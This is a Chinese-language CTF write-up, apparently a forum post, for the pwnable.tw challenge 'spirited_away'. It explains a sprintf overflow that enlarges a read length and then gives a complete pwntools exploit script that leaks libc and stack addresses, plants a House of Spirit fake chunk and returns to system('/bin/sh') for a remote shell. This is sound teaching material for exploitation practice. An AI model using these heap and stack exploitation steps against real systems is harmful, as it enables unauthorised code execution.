-
-
[原创]pwnable.tw - spirited_away
-
2018-8-21 17:14 3813
-
漏洞:
数组v1的大小是0xE8-0xB0=0x38,也就是56,在sprintf中输出时,已有的字符串是54,其中将通过格式化输出计数器cnt的值,cnt是个数值,但作为char输出时,每一个数就是1个byte,故当cnt为三位数时,将放生溢出,v1是栈变量,存储在其后的是变量nbytes和var_AC、char数组s、var_58、char数组buf在堆中的地址,恰好,nbytes是read函数用来读取用户输入的name和comment的大小,当cnt为三位数时,整个字符串的最后一位'n'将会溢出到nbytes所在的内存空间,char型的‘n’被当作size_t型,也就是0x6E,即110。于是这样可达到将原本大小为60的name、comment扩大为110,同时,在read函数中用来存储用户输入的buf和s数组原本设定的大小是0x3C和0x50,两个数组将发生溢出
思路:
free的对象是buf数组在堆上。于是,可以在栈上构建一个伪造的chunk,然后通过溢出,覆盖原本在栈上,指向buf内存空间的指针,然后通过操作触发free,将我们伪造的chunk加入到fastbin中,最后通过malloc得到伪造的目标堆块
exp:from pwn import * def create(name,age,reason,comment): # Please enter your name: p.recvuntil('name: ') p.send(name) # Please enter your age: p.recvuntil('age: ') p.sendline(age) # Why did you came to see this movie? p.recvuntil('movie? ') p.send(reason) # Please enter your comment: p.recvuntil('comment: ') p.send(comment) def nextOne(chooise): # Would you like to leave another comment? <y/n>: p.recvuntil('<y/n>: ') p.send(chooise) def exploit(): # leaking libc # gdb.attach(p, 'b*0x080486F8\nc') create('1'*0x3c,'-2','2'*0x18,'3'*0x3c) p.recvuntil('Reason: ') p.recvuntil('2'*0x18) _IO_file_sync = u32(p.recv(4))-7 log.info('_IO_file_sync:'+hex(_IO_file_sync)) # print info libc.address = _IO_file_sync-libc.symbols['_IO_file_sync'] system = libc.symbols['system'] log.info('system:'+hex(system)) binsh_addr = next(libc.search('/bin/sh')) log.info('binsh_addr:'+hex(binsh_addr)) nextOne('y') # leaking stack # gdb.attach(p, 'b*0x080486F8\nc') create('1'*0x3c,'-1','2'*0x50,'3'*0x3c) p.recvuntil('Reason: ') p.recvuntil('2'*0x50) stack = u32(p.recv(4)) log.info('stack:'+hex(stack)) nextOne('y') # trigger stack overflow force = log.progress('Trigger') for i in range(100): force.status("{0}".format(i)) create('1'*0x3c, str(i), '2'*0x50, '3'*0x3c) nextOne('y') # House of Spirit # gdb.attach(p, 'b *0x80488C6') reason = p32(0x41)+60*'1'+p32(0x1234) reason = reason.rjust(0x50,'2') comment = '3'*0x50 comment += p32(100) comment += p32(stack-0x60) create('1'*0x3c,'100',reason,comment) nextOne('y') payload = 'A'*68 payload += p32(system) payload += p32(0xdeadbeef) payload += p32(binsh_addr) create(payload,'101','2'*0x50,'3'*0x3c) nextOne('n') p.interactive() if __name__ == '__main__': context.binary = "./spirited_away" context.terminal = ['gnome-terminal', '-x', 'sh', '-c'] e = ELF('./spirited_away') flag = 1 if flag: p = remote("chall.pwnable.tw", 10204) libc = ELF('./libc_32.so.6') exploit() else: p = process('./spirited_away') libc = ELF('/lib/i386-linux-gnu/libc.so.6') exploit()
[CTF入门培训]顶尖高校博士及硕士团队亲授《30小时教你玩转CTF》,视频+靶场+题目!助力进入CTF世界
最后于 2018-8-21 17:43
被该用户很懒编辑
,原因:
赞赏
看原图